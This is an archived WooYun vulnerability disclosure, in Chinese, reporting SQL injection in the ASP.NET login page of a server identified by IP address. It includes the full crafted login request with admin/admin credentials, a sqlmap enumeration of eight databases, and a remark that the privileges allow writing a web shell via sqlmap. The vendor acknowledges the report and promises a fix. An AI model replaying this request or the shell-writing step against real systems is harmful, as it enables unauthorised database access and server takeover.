乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
RT
URL:
http://222.75.160.45/
测试:
GET /First.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDUwNDA5ODY4D2QWAgIDD2QWBgIDDw9kFgIeCW9ua2V5ZG93bgVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIFDw9kFgIfAAVUaWYoZXZlbnQua2V5Q29kZT09MTMpICAge2RvY3VtZW50LmFsbC5CdXR0b24xLmZvY3VzKCk7ZG9jdW1lbnQuYWxsLkJ1dHRvbjEuY2xpY2soKTt9ZAIJDw8WAh4EVGV4dGVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKQ2hhbmdlQ29kZbk537oBpPAXEYambR7AWvbb%2FNqV&__EVENTVALIDATION=%2FwEWCAKnyfICAr%2FMgnIC74vd6QcCq6jQ0AcC6dq9pwoCjOeKxgYCu6uxhggC2PaFvQo1rniVNxygLN8Op7TojF2aqycGEw%3D%3D&TextName=admin&TextPassword=admin&Validator=BVXN&Button1=%E7%99%BB%E5%BD%95 HTTP/1.1Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://222.75.160.45/Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Accept-Encoding: gzip, deflateHost: 222.75.160.45Proxy-Connection: Keep-AliveCookie: ASP.NET_SessionId=4d0rms55z342dn55u2xceivy; yzmcode=BVXN
数据库:
available databases [8]:[*] alarmimage[*] master[*] model[*] msdb[*] ReportServer$DB2008[*] ReportServer$DB2008TempDB[*] tempdb[*] ZSHJK
权限足够大 可以利用sqlmap交互写shell 跑个表都好慢
(ˇˍˇ) 爱你在心口难开
危害等级:高
漏洞Rank:15
确认时间:2015-10-14 11:19
谢谢!我们将尽快修改。
暂无